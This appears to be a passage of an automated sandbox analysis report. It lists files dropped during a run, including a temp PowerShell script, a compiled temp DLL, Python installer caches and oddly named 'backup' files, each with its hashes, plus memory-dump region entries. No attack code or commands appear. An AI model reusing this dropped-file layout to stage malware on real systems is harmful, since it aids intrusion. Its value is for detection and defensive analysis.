                                  SHA512

                                  c2d95bf41e99e07f77a49be23bc143a785a5544474cf6c40e4d93b89d48e25afb36964368f3c5aedb5d253cb3debe5ed4b08ce3e8d955d0758cfb744f3535a6c

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Filesize

                                  944B

                                  MD5

                                  fa62682ae5c4db5ff5c8081be40619a3

                                  SHA1

                                  c8492e65565a2bf0913cf501fbd4109e22f32ef3

                                  SHA256

                                  044ae72c1d6bd0d35731d675cad25040163bc0d06970772bd7b04e79b7b7618a

                                  SHA512

                                  fa940f723775420022e5f58e276d8f5ddba51dbe17a7227ab349a34498e687bb1159d0615a17a68d1a5416cc0c103951bdb05856dd984856703f16733bd8b5fd

                                • C:\Users\Admin\AppData\Local\Package Cache\.unverified\lib_JustForMe

                                  Filesize

                                  7.1MB

                                  MD5

                                  f6ddadd0d817ce569e202e57863ae919

                                  SHA1

                                  3a2f6d81c895f573464d378ab3bcfb6d8a48eaf2

                                  SHA256

                                  63032d6386c94e83a3b7b7b9eefc23493f976bd435a10668aa263d1ca1cb22e1

                                  SHA512

                                  7d970e62e3b513b2fa98e8a83ce3080fc6652bba2b70a5127a46ca5c2b0dee8790e48fffef56d15bec2706a997ade5a3c05ff5df4c6be2b3632b6bf7aa6e9ef2

                                • C:\Users\Admin\AppData\Local\Package Cache\.unverified\tcltk_JustForMe

                                  Filesize

                                  3.4MB

                                  MD5

                                  fd7e13f2c36fe528afc7a05892b34695

                                  SHA1

                                  14a9c4dfd12e1f9b1e64e110166500be1ef0abb1

                                  SHA256

                                  2a24729e58bce7c2abde7225dc2de32539b4c4ef3609b53b54f643955d01c4b0

                                  SHA512

                                  7b7060672f680c418f7ebbddf2ba693539b1284566ab756c8061b61a582d13537aa215dad03db5c803eeba2f6fcc7fad7ed2857931ea205048abd905afef1d4f

                                • C:\Users\Admin\AppData\Local\Package Cache\{537B2AF5-504B-4303-99CB-FDE56F47AA51}v3.12.6150.0\exe.msi

                                  Filesize

                                  724KB

                                  MD5

                                  2db9e147e0fd938c6d3c1e7cf6942496

                                  SHA1

                                  e4333f4334b5df6f88958e03ad18b54e64a1331f

                                  SHA256

                                  9f3fc998d3ef429818a8047a43aad89f2d88c190385ba5ac57124132acda9eab

                                  SHA512

                                  4b9cbbf2d26cab8be365671d91c7f95216e90a9de30b87224228d1ab5db64a888fbf0b552d259dc5552d2da28451a394c227da312c73807a9c69fe6edfa3cbc8

                                • C:\Users\Admin\AppData\Local\Package Cache\{901B913C-FA63-48D2-9842-7D7676739378}v3.12.6150.0\core.msi

                                  Filesize

                                  1.9MB

                                  MD5

                                  d4c1f834f30032f220409a17e0f688cd

                                  SHA1

                                  61dc90b164c3797456a8ed775b353a087054fd0f

                                  SHA256

                                  675c023e78eaed980638a969feaaa07c52a5a604d89e81434e6c462f17eebc12

                                  SHA512

                                  b7e97a5fab185b5d9150e07e1707aca21285ae62d4a25997040349eab78a2ad2f9a555980bb221a3a91120651c04a5df0909387e8931e76094de41f7697b124f

                                • C:\Users\Admin\AppData\Local\Temp\30bbf1d69ab0882fed210df09e1e744ansHPs8\BackupStart.csv

                                  Filesize

                                  636KB

                                  MD5

                                  6babe9070e590172a9797afb604cfb90

                                  SHA1

                                  c8aac29f9220e399a829fb02b07c66396481bc82

                                  SHA256

                                  72bf9fb0dfb94a02559b2be4519178ceb1bb63b837b7cb0a7d8192154a0622ad

                                  SHA512

                                  5190ebedd44ed2e31dbba51d12d911ec56102c8b3853698bad46a1c6e9608b336588aa1ee91954c237fc4bb1e58418d1f280e41737e4f1d24eb58b1bfa935548

                                • C:\Users\Admin\AppData\Local\Temp\30bbf1d69ab0882fed210df09e1e744ansHPs8\UnlockBackup.txt

                                  Filesize

                                  1.1MB

                                  MD5

                                  be2290f73ddcedef156d4155202f3c20

                                  SHA1

                                  ea98970dbf35bd3b1b556abdfb09660f1cc08ec9

                                  SHA256

                                  eb980ff4233547e5488beb4e58685c2998ef0fd1909674c82ff2285a0b83c567

                                  SHA512

                                  05d0d0d6df69e311f73c1d7cfb35279c2b696105cbdc115f43f98466c5cf030d2be31d76104b70456933f2b03bac74b1294dac8937f922190747f88953e686a9

                                • C:\Users\Admin\AppData\Local\Temp\30bbf1d69ab0882fed210df09e1e744ansHPs8\UseBackup.xlsx

                                  Filesize

                                  11KB

                                  MD5

                                  aad09e5816b356fce7964daaec14d955

                                  SHA1

                                  1594e6629cdfd7978c48f98456d219e19be227d2

                                  SHA256

                                  6ae6c5e94701c9f0bb9930b2c0723e85d1449689c274d607095a6ac9710acacc

                                  SHA512

                                  064995bf6774f00ba509caaf8a0179f8c1ff431f273c24aaf5c7f48b62a040156f5517347ecd95fde712cf187f6b9221c90607b18fe18cf3b597921eebc005bc

                                • C:\Users\Admin\AppData\Local\Temp\ChedmB0hfd.ps1

                                  Filesize

                                  380B

                                  MD5

                                  cbb9a56c9c8d7c3494b508934ace0b98

                                  SHA1

                                  e76539db673cc1751864166494d4d3d1761cb117

                                  SHA256

                                  027703af742d779f4dcde399ac49a3334f1b9e51b199215203e1f4b5e3251fe5

                                  SHA512

                                  f71e0a521c2b0aa034e0a2c9f0efd7d813d8408d118979f8e05ecd3aa6fb94c67793e2302ed9455aad9a63d43a53fa1ac2b3d45f7bdfa1cc8104c9a9ace84129

                                • C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20241104024818_000_core_JustForMe.log

                                  Filesize

                                  1KB

                                  MD5

                                  9f190f62aace0367c91a959cc11ea7db

                                  SHA1

                                  df84e4a53a2d563fee16f1aadb04972ea4307a8e

                                  SHA256

                                  154b0f66e674f0280637d37b66c4b89e5bfd8ecd81441bf9d0f567266c39288d

                                  SHA512

                                  55b7040a6d86b5b4a0a6fe06071a712242b9ace0f29431621ec81c382e4f52a35bb79b6d995a7e19c9770436e5531db03475f5d4331eeb4f4d355a2175e6955e

                                • C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20241104024818_001_exe_JustForMe.log

                                  Filesize

                                  1KB

                                  MD5

                                  ff82da4f8a0c5548cc732f210c8b52b8

                                  SHA1

                                  2e05b46beae3f3ae7cbdfa43b7f2cac790b014e6

                                  SHA256

                                  8a102c85ee623ee6710178fa0af65611b668758ccb3314c0a9ce141aa6929652

                                  SHA512

                                  57ea4ddfd570c901c0e751cdc7dbf91a0767086baf3e3d069d79e0e02de94078cd6ae89ee434c773b45c12fb044b494242e8e4262de8af589e4f9af7f6854b83

                                • C:\Users\Admin\AppData\Local\Temp\RESA875.tmp

                                  Filesize

                                  1KB

                                  MD5

                                  9bd689e5278ac26e84b0e7866908535b

                                  SHA1

                                  e59041d291a32e63674f343f4ba130dd4e19ca5c

                                  SHA256

                                  f26252720fdb4f39511608db9e63c7139fa4f43420e9441723be477256fd546e

                                  SHA512

                                  133f4a86d10edd31426b1cea778470f66c4abf252ae602e7af124393c6880844f36368a7fd36a12be6004e03a1c452e6f21129bde0a25fba5ad73db9a084dd53

                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_td5nes5k.x1a.ps1

                                  Filesize

                                  60B

                                  MD5

                                  d17fe0a3f47be24a6453e9ef58c94641

                                  SHA1

                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                  SHA256

                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                  SHA512

                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                • C:\Users\Admin\AppData\Local\Temp\obnw3idv\obnw3idv.dll

                                  Filesize

                                  3KB

                                  MD5

                                  31f88152d1e3349c4902bce5e8c3b3c7

                                  SHA1

                                  a976dad2cc8e6d0963282666dece8feda511cde6

                                  SHA256

                                  f1c2017af6fd652ec105f50b0ac205b9640847306dcc1793737cca00ddae6368

                                  SHA512

                                  98ec2fb0fce497cab8c0b4647fecf680ff799a70c58399f71a571f2334373f5edf277017deade4c9f2b391188d2b388d855b96fb384188b7968c938bc9ff2207

                                • C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

                                  Filesize

                                  1.8MB


                                • C:\Users\Admin\AppData\Local\Temp\python-installer.exe

                                  Filesize

                                  25.3MB


                                • C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe

                                  Filesize

                                  858KB


                                • C:\Windows\Temp\{B84B8C03-801E-44EC-AA45-801249C835F1}\.ba\PythonBA.dll

                                  Filesize

                                  675KB


                                • C:\Windows\Temp\{B84B8C03-801E-44EC-AA45-801249C835F1}\.ba\SideBar.png

                                  Filesize

                                  50KB


                                • C:\Windows\Temp\{B84B8C03-801E-44EC-AA45-801249C835F1}\pip_JustForMe

                                  Filesize

                                  268KB


                                • \??\c:\Users\Admin\AppData\Local\Temp\obnw3idv\CSC7D50F6DD4FEB43E28B3E933ADDF3E253.TMP

                                  Filesize

                                  652B


                                • \??\c:\Users\Admin\AppData\Local\Temp\obnw3idv\obnw3idv.0.cs

                                  Filesize

                                  312B


                                • \??\c:\Users\Admin\AppData\Local\Temp\obnw3idv\obnw3idv.cmdline

                                  Filesize

                                  369B


                                • memory/1684-103-0x00007FFCC52D0000-0x00007FFCC5D91000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/1684-99-0x0000025E949E0000-0x0000025E949E8000-memory.dmp

                                  Filesize

                                  32KB

                                • memory/1684-85-0x00007FFCC52D0000-0x00007FFCC5D91000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/1684-84-0x00007FFCC52D0000-0x00007FFCC5D91000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/1684-74-0x0000025E949B0000-0x0000025E949D2000-memory.dmp

                                  Filesize

                                  136KB

                                • memory/1684-73-0x00007FFCC52D3000-0x00007FFCC52D5000-memory.dmp

                                  Filesize

                                  8KB

                                • memory/4584-116-0x000001C8FF830000-0x000001C8FF880000-memory.dmp

                                  Filesize

                                  320KB